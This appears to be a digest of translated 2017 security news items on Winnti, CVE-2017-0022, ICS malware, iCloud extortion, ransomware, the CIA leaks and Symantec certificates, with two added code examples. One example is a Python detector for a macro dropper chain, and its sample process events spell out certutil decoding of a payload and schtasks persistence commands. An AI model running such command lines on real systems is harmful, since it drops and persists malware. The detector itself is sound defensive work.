It is noticeable that new UK laws focus on using the ISPs to exert the government's new surveillance (Investigatory Powers Act) and censorship (the Digital Economy Bill) capabilities. The former ensures that the government will simply be able to take the internet data that US ISPs are likely to be able to sell, while the latter will enable the government to use the ISPs to block public access to websites it deems unsuitable (as it already does in a limited form with sites such as The Pirate Bay). Both laws would almost certainly be struck down by the European Courts as unconstitutional if the UK remained within the European Union.

What isn't yet certain is whether disapproving the FCC's privacy rule in the US is really the first step towards dismantling net neutrality. Chairman Pai can legitimately claim that he had no role in this (other than providing time for it to happen). It is the Senate rather than the FCC that has done so.

Net neutrality has been in force since the FCC's Open Internet Order and the reclassification of ISPs that imposed it. It has already stood the test of time and would probably require government legislation rather than FCC action to reverse it.

Writing in the LegalMatch law blog, Jonathan Lurie comments, "If the rule was to be fully stripped away, it would most likely involve an act of Congress explicitly doing so. However, Congress and the Trump administration do not seem to be making such legislation a priority." Instead, he suggests that, "it has been implied that [chairman Pai's FCC] would likely see changes allowing ISPs to prioritize data in certain situations -- basically creating carveouts to the general rule. There's no particular indication as to what these carveouts might include, but it is easy to imagine a situation where exceptions could swallow the rule."

The irony in the current situation is that ISPs have argued that the FCC privacy rules distort the advertising market and hamper innovative new approaches, while supporters of net neutrality claim that it will enable innovative companies with new approaches to internet services.


The Winnti Gang continues its activity and leverages GitHub for C&C Communications
26.3.2017 securityaffairs Virus

Trend Micro discovered the Chinese threat actor Winnti has been abusing GitHub service for command and control (C&C) communications.
Security experts at Trend Micro continue to monitor the activities of the Chinese Winnti hacker group; this time the hackers have been abusing GitHub for command and control (C&C) communications.

“Recently, the Winnti group, a threat actor with a past of traditional cybercrime -particularly with financial fraud, has been seen abusing GitHub by turning it into a conduit for the command and control (C&C) communications of their seemingly new backdoor (detected by Trend Micro as BKDR64_WINNTI.ONM).” reads the analysis published by Trend Micro.

“Our research also showed that the group still uses some of the infamous PlugX malware variants—a staple in Winnti’s arsenal—to handle targeted attack operations via the GitHub account we identified.”


The Winnti group was first spotted by Kaspersky in 2013; according to the researchers, the gang has been active since 2007.

The gang is financially motivated and was mostly involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry, and the majority of the victims are located in Southeast Asia.

Malware researchers at Trend Micro discovered that the malware connected to a certain GitHub account in order to obtain the location of its C&C servers.

The group continues using the PlugX RAT for its attacks along with an alleged new backdoor tracked as BKDR64_WINNTI.ONM.

The malicious code retrieves an HTML page stored in a GitHub project that contains an encrypted string; once decrypted, this string yields the IP address and port number of the command and control server.

The GitHub project used by the Winnti gang was created in May 2016, and its first use for C&C communications dates back to August 2016. Experts believe the GitHub account was most likely created by the attackers themselves rather than hijacked from its original owner.

The experts observed nearly two dozen C&C server IP and port combinations between August 17 and March 12. The C&C servers were located mostly in the United States, with two of them in Japan.

The recently discovered Winnti backdoor uses a loader that leverages a modified version of a Microsoft registry tool (loadperf.dll) and the WMI performance adapter service in Windows (wmiAPSrv).

The loader imports and decrypts the main payload and then injects it into the svchost.exe. The payload is then loaded into memory.

“Abusing popular platforms like GitHub enables threat actors like Winnti to maintain network persistence between compromised computers and their servers, while staying under the radar,” concludes Trend Micro. “Although Winnti may still be employing traditional malware, its use of a relatively unique tactic to stay ahead of the threat landscape’s curve reflects the increased sophistication that threat actors are projected to employ.”


CVE-2017-0022 Windows Zero-Day flaw used by AdGholas hackers and it was included in Neutrino EK
26.3.2017 securityaffairs Exploit

The recently patched CVE-2017-0022 Windows Zero-Day vulnerability has been exploited by threat actors behind the AdGholas malvertising campaign and Neutrino EK since July 2016.
Microsoft has fixed several security flaws with the March 2017 Patch Tuesday updates. According to security experts at Trend Micro, the list of fixed vulnerabilities includes three flaws that had been exploited in the wild since last summer.

One of the vulnerabilities is an XML Core Services information disclosure vulnerability, tracked as CVE-2017-0022, that attackers can exploit by tricking victims into clicking on a specially crafted link.

“An information vulnerability exists when Microsoft XML Core Services (MSXML) improperly handles objects in memory. Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker could host a specially-crafted website that is designed to invoke MSXML through Internet Explorer. However, an attacker would have no way to force a user to visit such a website. Instead, an attacker would typically have to convince a user to either click a link in an email message or a link in an Instant Messenger request that would then take the user to the website.”

The flaw was discovered in a joint investigation by security researchers at Trend Micro and Proofpoint, and it was reported to Microsoft in September 2016.

Who exploited the CVE-2017-0022 flaw?

According to the security researchers at Trend Micro, the zero-day vulnerability has been exploited in the AdGholas malvertising campaign since July 2016. The exploit code of the flaw was added to the Neutrino exploit kit in September 2016.

The threat actor behind the AdGholas malvertising campaign was notable for its use of steganography, for its careful targeting despite the massive volume of malicious ads and impressions, and for its ability to evade detection by researchers.

Initially the attackers leveraged the CVE-2016-3298 and CVE-2016-3351 flaws to avoid detection; the experts at Trend Micro now speculate that they used the CVE-2017-0022 flaw for the same purpose.

“This vulnerability was used in the AdGholas malvertising campaign and later integrated into the Neutrino exploit kit. CVE-2017-0022 likely replaced the similar CVE-2016-3298 and CVE-2016-3351 vulnerabilities from the same campaign, which were addressed by previous patches.” reads the analysis published by Trend Micro.

“An attacker exploiting CVE-2017-0022 could use phishing attacks to lure potential targets to malicious websites. Successful exploitation of this vulnerability could allow a cybercriminal access to information on the files found in the user’s system.” explained the experts from Trend Micro. “In particular, the attacker would be able to detect if the system is using specific security solutions—especially ones that analyze malware.”

Trend Micro has published a detailed analysis of the CVE-2017-0022 flaw and of the attack chain that exploits it in a malvertising campaign leveraging the Neutrino exploit kit.


Malware posing as Siemens PLC application is targeting ICS worldwide
26.3.2017 securityaffairs ICS

Findings of the MIMICS project conducted by Dragos Threat Operations Center show a malware posing as Siemens PLC application is targeting ICS worldwide.
After the disclosure of the Stuxnet case, the security industry started looking at ICS malware with increasing attention. Malware that infects an industrial control system could cause serious damage and endanger human lives.

Ben Miller, Director of the Dragos Threat Operations Center, conducted interesting research based on data on ICS incidents collected over the last 13+ years.

The project studied modern industrial control systems (MIMICS) from completely public datasets.

“In this project the Dragos, Inc. team looked at public data sources such as VirusTotal to identify malware and (in many cases) legitimate ICS files being uploaded to encourage a more nuanced discussion around security in the modern ICS.” explains Dragos CEO, Robert M. Lee.

Miller discovered ~30k samples of infected ICS files and installers dating back to 2003. The most dangerous threats are fast-spreading malware such as Sivis, Ramnit, and Virut.

The experts confirmed that infections of ICSs are not rare, but they highlighted that there are only three publicly showcased pieces of ICS-tailored malware: Stuxnet, Havex, and BlackEnergy2. There have been rumors of another couple of pieces of ICS-tailored malware exploited in active campaigns, some of them studied by researchers at IronGate.

One of the most interesting findings of the MIMICS research is that multiple variants of the same malware, disguised as software for Siemens programmable logic controllers (PLCs), have been detected 10 times over the last 4 years. The most recent detection of this specific ICS malware was in early March.

“Starting in 2013 there were submissions from an ICS environment in the US for Siemens programmable logic controller (PLC) control software. The various anti-virus vendors were flagging it as a false positive initially and then eventually a basic piece of malware.” continues Lee. “Upon our inspection, we found that variations of this file and Siemens theme 10 times over the last 4 years with the most recent flagging of this malicious software being this month in 2017. In short, there has been an active infection for the last 4 years of an adversary attempting to compromise industrial environments by theming their malware to look like Siemens control software. The malware is simply crimeware but has seemingly been effective.”

Researchers encourage asset owners and operators to implement simple best practices, such as network security monitoring, in order to protect their environments; for example, software supply chain validation can be sufficient to drastically reduce a concerning attack vector.

“The last finding we had was driven by the hypothesis that many of the IT security teams and security technologies that are not used to ICS environments may be flagging legitimate ICS software as malicious where it could be inappropriately placed in public databases.” concludes the report.


Apple experts communicated with the hackers but refused to pay the ransom

25.3.2017 Novinky/Bezpečnost Apple
Apple's security experts have been in contact with hackers from the Turkish Crime Family group, who are threatening to wipe the data of hundreds of millions of users from the iCloud service. This was reported by Motherboard, which noted that the experts have taken an uncompromising stance towards the cybercriminals. They reportedly will not negotiate.
The hackers gave Apple a clear ultimatum: either it pays the demanded ransom by 7 April, or the data of more than 625 million iCloud users will be deleted. The hackers claim to have obtained exactly that many sets of login credentials.

However, e-mail correspondence obtained by Motherboard shows that the American computer giant has no intention of negotiating.

Apple's security experts first asked the attackers for a sample of the data that would actually prove that users were at risk. The cybercriminals did send one. Instead of paying the ransom, however, the employees of the American computer giant then began to "threaten" the hackers themselves.

They pointed out that the company does not reward hackers in any way when their actions break the law. They further noted that they had archived the entire correspondence and handed it over to law enforcement.

Don't worry, says Apple
On Friday, representatives of the company with the bitten-apple logo issued an official statement saying that users have nothing to fear. They claim the hackers only hold data originating from the 2012 attack on the LinkedIn network.

According to the above, then, theoretically only users who use the same password on iCloud as on LinkedIn and have not changed it in the last five years should be at risk.

ZDNet nevertheless pointed out that any downplaying of the threat is out of place. According to the sample of the hackers' data that its editors had at their disposal, users really are at risk. At this moment it is therefore not entirely clear whether the threat to users is real or not. In any case, users should back up their iCloud data to be safe.

How iCloud works
The iCloud service lets users automatically store contacts, messages, photos and other files on a remote server (the cloud). That is useful above all when you lose your phone or tablet. You simply enter your credentials on the new device and all of your data is immediately back; you lose nothing.

But as is clear from the lines above, the cloud also carries a certain risk, one that security experts have been pointing out regularly for several years. Because you do not hold the data yourself, someone else can get to it as well. All it takes is knowing your e-mail and password.

And that is precisely what the hacker group has allegedly managed to do for hundreds of millions of accounts. The hackers are now demanding a ransom from the American computer giant. If Apple's representatives do not pay it by 7 April, as noted above, the cybercriminals will delete the users' data, according to Neowin.

The attackers keep raising the ransom. At first they wanted USD 75,000 (CZK 1.9 million) from the American computer giant. Just a few days later they demanded double. The amount is supposed to increase every three days until April if Apple does not pay.


Protect your data even when using the cloud

25.3.2017 SecurityWorld Cloud Computing
Although the cloud is secured, it does not guarantee immunity from data leaks. Now that the cloud is fast becoming mainstream in IT, companies must think more critically about how to strengthen their security beyond the default security infrastructure provided by their cloud service providers.

Mainstream cloud providers strive to offer robust security measures. These typically include server-side encryption, user management, data recovery capabilities and device-wipe options to protect files in the cloud.

Yet despite all of these measures, there is a significant but little-discussed gap in cloud security that is tied to another major trend in mobile work: the use of personal devices for business purposes (BYOD).

According to a survey, more than 40% of employees in the US currently use personal smartphones, tablets and flash drives for work purposes, and 83% admit they prefer cloud applications to their on-premises equivalents, so they will probably seek them out.

Whether or not the employer explicitly allows or forbids the use of the cloud and its applications, the same problem remains: once files are synchronized to a mobile device, which, let's admit it, is the first and foremost reason for using the cloud, the provider's default encryption disappears and the files from the cloud are no longer protected.

Every year many tens of millions of smartphones are lost. Add to that number the lost and stolen tablets, flash drives and laptops, and it is easy to see how simply unencrypted data can fall into the wrong hands.

Lost and stolen devices are one of the main causes of data breaches, largely because these devices lack encryption.

The good news is that, despite the existing gaps in cloud security, protecting files is possible.

There are several simple ways to maximize the benefit of the cloud's default security infrastructure and keep the business secure and compliant with any number of regulations.

1. File-level data encryption

It is no longer enough to protect just the perimeter, which today essentially means relying solely on server-side encryption.

Nor is it enough merely to encrypt files at rest in storage; that would suffice if your team never synchronized any files to the cloud, but that is essentially no longer feasible in today's cloud-based ecosystem.

File-level encryption, however, protects the data itself (rather than the place where it is stored) before it ever reaches the cloud. This means the files remain encrypted wherever they travel, including to mobile devices. Only authorized users can access their contents.

Deploying this kind of encryption to reinforce cloud providers' default measures is crucial for keeping financial information, personal data and intellectual property safe, especially in workplaces supporting BYOD and where team members work remotely or on the road.

2. Deploying CASB systems (Cloud Access Security Brokers)

Currently only 5% of companies use a CASB, but studies predict that adoption will soar to 85% by 2020.

A CASB provides a unified security solution that lets team administrators detect data-leak risks, deploy protections and enforce security protocols from a single place.

A CASB solution also lets employees keep using the cloud providers they are already accustomed to, while giving administrators the means they need to monitor how files are shared.

A CASB does not let data leak through gaps and introduces a high degree of visibility, which is necessary if you need to know exactly where sensitive content is stored and who has access to it.

As data in the cloud keeps growing, more and more companies are starting to use a CASB to keep up with the information and guarantee its more effective protection.

3. Separating encrypted content from the keys

If the encryption keys are stored separately from the content, a hacker cannot gain access to the content without holding those keys.

Deploy a solution that ensures this separation and enables the IT department to maintain proper "security hygiene". This approach protects your data from leaking even if the cloud provider is compromised.
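An added example that ties together point 1 (encrypt the file itself before it is synchronized) and point 3 (keep the keys apart from the content); it is illustration code, not a product from the article. Only the Python standard library is assumed, so HMAC-SHA256 in counter mode with an encrypt-then-MAC tag stands in for a vetted AEAD such as AES-GCM, which is what a production deployment should use; the store names, key name and file contents are constructed.

```python
import hashlib
import hmac
import secrets
import struct

NONCE_LEN, TAG_LEN = 16, 32


def _derive_keys(master_key: bytes, file_id: bytes):
    """Per-file encryption and MAC keys derived from a master key that never
    leaves the key store (HMAC as a KDF; a stdlib stand-in for HKDF)."""
    enc = hmac.new(master_key, b"enc|" + file_id, hashlib.sha256).digest()
    mac = hmac.new(master_key, b"mac|" + file_id, hashlib.sha256).digest()
    return enc, mac


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (stand-in for a real block cipher)."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt_file(plaintext: bytes, master_key: bytes, file_id: bytes) -> bytes:
    """Encrypt-then-MAC; returns nonce || ciphertext || tag. The tag also covers
    the file id, so one file's blob cannot be swapped in under another name."""
    nonce = secrets.token_bytes(NONCE_LEN)
    enc_key, mac_key = _derive_keys(master_key, file_id)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, file_id + nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt_file(blob: bytes, master_key: bytes, file_id: bytes) -> bytes:
    """Verify the tag before touching the ciphertext; a wrong key or a modified
    blob raises instead of returning garbage."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short")
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    enc_key, mac_key = _derive_keys(master_key, file_id)
    expected = hmac.new(mac_key, file_id + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed: wrong key or modified file")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


# Two separate stores (constructed): the sync provider only ever sees CLOUD;
# the master key lives in KEY_STORE, which is never synchronized.
CLOUD = {}
KEY_STORE = {"team-finance": secrets.token_bytes(32)}


def sync_to_cloud(name: str, data: bytes, key_name: str = "team-finance") -> None:
    """What the client does before the file leaves the device."""
    CLOUD[name] = encrypt_file(data, KEY_STORE[key_name], name.encode())


def restore_from_cloud(name: str, key_name: str = "team-finance") -> bytes:
    """What an authorized user with access to the key store can do."""
    return decrypt_file(CLOUD[name], KEY_STORE[key_name], name.encode())


def provider_can_read(name: str, needle: bytes) -> bool:
    """The view of a compromised provider: is the plaintext visible in the blob?"""
    return needle in CLOUD[name]


if __name__ == "__main__":
    sync_to_cloud("q1-ledger.xlsx", b"ACCOUNT 4711 BALANCE 1,900,000 CZK")
    print("provider sees plaintext:", provider_can_read("q1-ledger.xlsx", b"BALANCE"))
    print("authorized restore:", restore_from_cloud("q1-ledger.xlsx"))
```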

The cloud is fast becoming a necessity for businesses that want to keep pace with today's work practices. Merely deploying cloud solutions, however, is not enough.

Businesses must do their own research and find the right enhancements that adequately strengthen their default security protocols.

File-level encryption, a CASB and separating keys from content are great ways to start keeping your most sensitive files safe.


Spear phishing campaign targeted Saudi Arabia Government organizations
25.3.2017 Securityaffairs Phishing

Security researchers at MalwareBytes have uncovered a spearphishing campaign that targeted Saudi Arabia Government organizations.
Security experts at MalwareBytes have spotted a new spear phishing campaign that is targeting Saudi Arabia governmental organizations.

According to the experts, the campaign has already targeted about a dozen Saudi agencies. The attackers used weaponized Word documents and tricked victims into opening them and enabling macros.

The document is written in Arabic; if the victim opens it, the machine is infected and the phishing document is sent on to the victim's contacts via their Outlook inbox.

The malicious payload is embedded in the macro as Base64 code and is decoded with the certutil utility into a PE file, which is then executed.

The binary dropped on the infected machine is coded in .NET and its code is encrypted but not obfuscated. The malware was designed to steal information from the victims and upload it to a remote server.

“Decrypting it we can see the main payload (neuro_client.exe renamed to Firefox-x86-ui.exe here) and two helper DLLs” reads the analysis published by MalwareBytes.


The malicious code gains persistence via the Task Scheduler.

MalwareBytes is still monitoring the campaign and plans to provide further information in the future.

I suggest reading the analysis that also includes the IoCs.
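An added detection example for the chain the analysis describes (macro, certutil decoding Base64 into a PE, execution of the dropped file, Task Scheduler persistence); it is not code from MalwareBytes or the article. The process events, paths and the header-only PE stub are constructed; the file name Firefox-x86-ui.exe is the one the article mentions.

```python
import base64
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CERTUTIL_DECODE_FLAGS = ("-decode", "-decodehex", "-urlcache")
USER_WRITABLE_HINTS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


@dataclass
class ProcessEvent:
    """One process-creation record (constructed; real EDR/Sysmon fields are richer)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def base64_decodes_to_pe(text: str) -> bool:
    """Does a Base64 blob (e.g. lifted from a macro) decode to a PE file?
    Checks the 'MZ' DOS header and the 'PE\\0\\0' signature at e_lfanew."""
    try:
        data = base64.b64decode(text, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def _image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestors(by_pid, pid):
    """Parent chain of a process, nearest parent first."""
    seen, ev = set(), by_pid.get(pid)
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        yield ev


def detect_macro_dropper_chain(events):
    """Flag (rule, pid) pairs for: certutil decoding under an Office process,
    an executable in a user-writable path started by an Office process, and
    schtasks /create anywhere below an Office process."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name, cmd = _image_name(e.image), e.cmdline.lower()
        lineage = [_image_name(a.image) for a in _ancestors(by_pid, e.pid)]
        office_in_lineage = any(a in OFFICE_APPS for a in lineage)
        if name == "certutil.exe" and office_in_lineage and any(f in cmd for f in CERTUTIL_DECODE_FLAGS):
            findings.append(("office_certutil_decode", e.pid))
        if lineage and lineage[0] in OFFICE_APPS and any(h in e.image.lower() for h in USER_WRITABLE_HINTS):
            findings.append(("office_spawned_temp_exe", e.pid))
        if name == "schtasks.exe" and "/create" in cmd and office_in_lineage:
            findings.append(("office_lineage_schtasks_create", e.pid))
    return findings


def _constructed_pe_stub() -> bytes:
    """68-byte header-only stand-in for a PE file (not runnable): MZ header,
    e_lfanew pointing at offset 0x40, then the 'PE\\0\\0' signature."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\0\0"


MACRO_BLOB = base64.b64encode(_constructed_pe_stub()).decode()     # what a macro would carry
NOT_PE_BLOB = base64.b64encode(b"just some text").decode()         # benign Base64 for comparison

# Constructed process tree: Word spawns certutil (decode) and the decoded binary,
# which registers a scheduled task; an admin's certutil -verify from cmd is benign.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "WINWORD.EXE /n invoice.docm"),
    ProcessEvent(300, 200, r"C:\Windows\System32\certutil.exe",
                 r"certutil -decode C:\Users\u\AppData\Local\Temp\p.txt C:\Users\u\AppData\Local\Temp\Firefox-x86-ui.exe"),
    ProcessEvent(400, 200, r"C:\Users\u\AppData\Local\Temp\Firefox-x86-ui.exe", "Firefox-x86-ui.exe"),
    ProcessEvent(500, 400, r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /tn Firefox-x86-ui /tr "C:\Users\u\AppData\Local\Temp\Firefox-x86-ui.exe"'),
    ProcessEvent(600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcessEvent(700, 600, r"C:\Windows\System32\certutil.exe", "certutil -verify server.cer"),
]


if __name__ == "__main__":
    print("macro blob is a PE:", base64_decodes_to_pe(MACRO_BLOB))
    for rule, pid in detect_macro_dropper_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```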


Merry Christmas, or How Ransomware Encrypted the Data of Prague Companies Before the Year-End Close

24.3.2017 Lupa.cz Viry
Another ransomware story that ends happily after all. But just restoring the data and filling in the gaps from incomplete backups took a month.
Our article from the end of last year about how ransomware hit a small healthcare company in Brno sparked a lot of debate. Many people were surprised above all that a business would still have its IT done by "the neighbour's son" and raise its security risks as a result. Today's story is from Prague and shows that ransomware can cause trouble even for a smaller company full of more technically skilled people.

To be precise, these are two companies linked by common ownership. One focuses on trading in mobile technology and employs around fifteen people; the other runs a restaurant and gives work to about eight people.

These linked companies had already moved a number of IT matters "out" in the past; for example, they run on Google's e-mail services. One thing, however, remained, partly for historical reasons: a server built from an ordinary Windows 10 PC running in the offices. Its sole purpose was to run the Pohoda accounting software.

Merry Christmas
At the end of 2016, around Christmas, when it was time for the year-end accounting close, it happened. About six people connect to the accounting server over Remote Desktop (RDP), but this time no data was available. Only a message appeared saying that the information on the server was encrypted and that, if the company wanted it back, it had to pay.

[Figure: Merry X-Mas ransomware. Source: Check Point Software Technologies]
Our previous story from Brno showed how hard it is for people without IT experience to find information about ransomware; in the Prague business, however, several employees knew what was going on. So they started looking for information online. All they found was that, at the time, no publicly available decryption key existed for the malware in question.

TIP: Pay, or you won't get your data. A story about how easily ransomware can make trouble for you

"We concluded that it was a type of ransomware for which there were no keys yet. So we started discussing whether to pay," Mr. D. tells Lupa. "But that didn't lead anywhere. One colleague found that these particular attackers really do decrypt the data after payment, but another colleague found the exact opposite. So we decided not to pay instead."

Just this search for information took several days. Then came the decision that the companies would restore the data from backup. Fortunately, it was stored on a hosted server outside the offices. But the restaurant, for example, lost half a year of accounting data, and the backups were definitely not made on a daily or weekly basis.

[Figure: Ransomware market share. Source: Check Point Software Technologies]
The story has a relatively good ending; the data was eventually pieced back together. But it took the employees a month, and the cost was estimated at between CZK 50,000 and 60,000. Incidentally, a decryption tool for this type of ransomware now exists.

Ransomware doubles
The Windows 10 server with Pohoda in the two Vinohrady companies is still running. There are some changes, though: it now sits behind a firewall, the ports were changed, and regular off-site data backups are in place. In response to the ransomware problem, the companies are also moving more services to the cloud. "Even as a small company we see the cloud as more secure. We don't employ cybersecurity experts, and our concerns lie elsewhere," says Mr. D.

[Figure: Evolution of Android ransomware. Source: ESET]
The companies did not investigate in detail how the ransomware got onto the server. In any case, some types of ransomware attack precisely through RDP, which the company uses for remote connections. "It's also possible that the boss did something there [on the server]," says Mr. D. Otherwise, ransomware spreads by various routes (PDFs, attachments, EXE files and so on) and copies the methods of traditional malware.

According to Check Point, the number of detected ransomware attacks doubled in the second half of last year, and a similar trend can be expected in the future. Ransomware already accounted for 10.5 percent of attacks (more in the study). Earlier surveys have already shown that it is probably the most profitable malware in history, since three to five percent of affected companies pay the ransom. Ransomware already has thousands of variants, and the main families are gradually being modified and evolving.

The largest share among ransomware, according to Check Point, belongs to Locky (41 percent), followed by Cryptowall (27 percent) and Cerber (23 percent). Ransomware can now also be rented as a service (malware-as-a-service).

ESET, for its part, points out that the use of ransomware on mobile devices, especially Android, is also increasing. So-called lockscreens, which lock the home screen, are appearing in particular, alongside traditional data encryption. According to ESET, ransomware attacks on Android are growing faster than attacks as a whole (more in the study). Ransomware is now also appearing on Android smart TVs.


Ukrainian hackers sell warez for tractors and Nebraska farmers rejoice
24.3.2017 Živě.cz Crime
Computers long ago made their way into traditionally dumb machines, so today even a car mechanic has to turn into an IT person from time to time. Manufacturers are also trying to exploit the computerization of machines commercially, as shown by an unusual case from the US concerning John Deere tractors.

When buying, farmers there sign fairly strict terms that allow the manufacturer to shut the tractor down remotely if there is a non-standard intervention in its equipment. For the same reason, farmers must use only official spare parts and service.

But they don't like that, because it is far from the cheapest option and comes with delays before a certified technician arrives. In extreme cases, a broken tractor and the delays can affect the harvest and thus lower income, for which the farmer, under the contract, cannot blame the manufacturer.

Ukrainian hackers took advantage of the situation and began offering, for a hefty fee, cracks on the internet that bypass these manufacturer checks, so that the farmer can both modify the firmware configuration and use any replacement part.

So we are slowly entering an era in which this kind of software patching moves from the world of home computers into places where it was unthinkable until recently. On the other hand, the risk of software infection grows hand in hand with it, so tractors from Nebraska may soon be part of all sorts of botnets.


Another batch of CIA leaks: "Dark Matter" and the "sonic screwdriver" are the bane of Apple fans
24.3.2017 Živě.cz BigBrother

After two weeks, another batch of leaked documents is here
This one will not please MacBook owners
The CIA has a whole package of tools for eavesdropping on them

WikiLeaks kept its promise and, after the first large batch of secret documents code-named Vault 7: Year Zero, a few hours ago released into the world another, this time somewhat smaller, package called Dark Matter, which consists of several manuals for employees of the US intelligence agency CIA.
And by employees we of course do not mean the cleaners and cooks in the canteen, but the specialists and operatives who use all sorts of cyber weapons to eavesdrop on and monitor their targets using various discovered weaknesses on the computer.

As last time, these are mostly old vulnerabilities that will long since have been fixed by now, but it can be assumed that the CIA continually improves its tools as its engineers discover new vulnerabilities.

DarkSeaSkies

On the other hand, even they are not as perfect as the hackers in films, and so they draw inspiration from various security conferences. This applies, for example, to the DarkSeaSkies toolkit, whose components bear a suspicious resemblance to an attack on the EFI bootloader in Apple computers, the procedure for which was published at the Black Hat 2012 conference. It seems the CIA took its inspiration from there.
DarkSeaSkies consists of three parts. The main one, DarkMatter, after which WikiLeaks also named this batch of leaks, is a special driver that settles in the Apple computer's bootloader without the user's knowledge and installs the remaining components. The first of these is SeaPea, which settles in the kernel of Mac OS 10.5, and the second is NightSkies.

Together they make it possible to take practically complete control of the Apple system without its owner even noticing. This means that agents could eavesdrop on, and send their own commands to, MacBooks with the given version of the operating system into which they managed to get their malware, whether by hand or by the usual infection route through some further vulnerability, for example in a web browser.

Sonic Screwdriver

Another interesting tool from Langley is the sonic screwdriver, which instead uses a vulnerability in the Thunderbolt-to-Ethernet adapter to penetrate the system. Its firmware contains special code that enables the installation of another control implant named Der Starke, which is said to be an improved version of the Triton malware.

Thunderbolt-to-Ethernet adapter. The CIA used a modified version with malware inside its firmware.

But enough quibbling: installing Triton requires appropriate privileges, and Sonic Screwdriver together with Der Starke bypass that. It is enough for the malicious loader to be connected to the MacBook during startup, and the system then infects itself even without knowledge of the password. The CIA therefore needs physical access to the laptop, but the installation is probably very fast, so only a moment is needed.

Once that succeeds, agents can again eavesdrop on what is happening on the computer and run their own code.
And that is all for this time. On the WikiLeaks website you will find leaked excerpts of the documentation for the individual tools with bizarre code names, which this time focus exclusively on the Apple platform. These are older attacks that may no longer be of any use today, but what matters is that the CIA was operating them at a time when it was worthwhile. At the same time, it is almost certain that the operatives from Langley are now attacking the current Apple platform as well.


Symantec made mistakes with EV certificates, browsers will stop trusting them
24.3.2017 Root.cz Security

Symantec did not sufficiently secure its certificate issuance process, Google's investigation finds. Google therefore plans a partial withdrawal of trust in Chrome and is calling on other browsers to do the same.
The Google Chrome development team has presented its intention to punish Symantec, specifically its certificate authority. At the beginning of the year, suspicions arose that the company's practices in issuing certificates were not what they should be, particularly with regard to Extended Validation (EV) certificates, that is, verification of the company itself.
Google therefore conducted an investigation, and the suspicions were confirmed. The main problem is that Symantec gave several other parties access to its infrastructure and did not supervise them sufficiently. Google believes that roughly 30,000 certificates were thus issued in violation of the baseline rules.

Punishment: faster certificate expiry
The proposed punishment does not contemplate a complete withdrawal of trust, particularly given the company's large market share, but it is still fairly severe. The proposed steps concern all certificate authorities owned by Symantec, including the very widespread GeoTrust authority.

Newly issued certificates could not have a validity longer than 9 months, otherwise Chrome would not trust them. As for existing certificates, trust in them will be withdrawn gradually over roughly one year, according to their validity period. Their owners should thus have enough time to obtain a new certificate.

The gradual withdrawal of trust would also apply to EV certificates, which would moreover be downgraded practically immediately to the level of ordinary certificates. The names of the companies to which they were issued would thus no longer appear in address bars. That can also be a problem, because some companies and services have trained their users to look for exactly that. Newly issued EV certificates would not be accepted by Chrome at all.

The company name will disappear from the address bar
Will other browsers join in?
Despite knowing about the problems, Symantec repeatedly failed to report them. Moreover, even after the information became public, Symantec refused to release the information the community required in order to assess the severity of the problems until it was explicitly asked, is how the proposal describes the aggravating circumstances.

It must be added that the proposal is not yet a done deal. The Chrome development team published it because it wants to win other browsers over to its side and coordinate the withdrawal of trust with them so that users are not confused. It can be expected, however, that the makers of other browsers will welcome the proposal. Mozilla with Firefox, for example, has previously shown that it has no mercy for bad certificate authorities, and was the first to withdraw trust from WoSign.

What matters is that nothing will change overnight and users will have time to replace their certificates. For Symantec it will of course mean a big blow and a large outflow of clients, but not the complete end. If the company takes remedial steps and operates more transparently, it can once again become a fully fledged certificate authority. But it will not happen right away.


Hackers blackmail Apple: pay, or we will wipe millions of devices!
24.3.2017 Živě.cz Apple
Hackers are threatening Apple that unless it pays a ransom, they will delete data from millions of its customers' devices. The hacker group Turkish Crime Family claims to have a database of approximately 627 million login credentials for the iCloud cloud service. They say they will wipe users' accounts on April 7, Neowin reported.
PCWorld contacted the hackers, who clarified that they had tested all the credentials using automated scripts. The result is more than 220 million accounts that are not sufficiently protected: they lack two-factor authentication.

The attackers initially demanded a ransom payment of 75 thousand US dollars (1.9 million crowns) in the virtual currency bitcoin or ethereum. They would, however, also settle for iTunes gift cards with a total value of 100 thousand dollars. Later the ransom rose to 150 thousand dollars (3.8 million crowns), and after three days the amount will rise again.
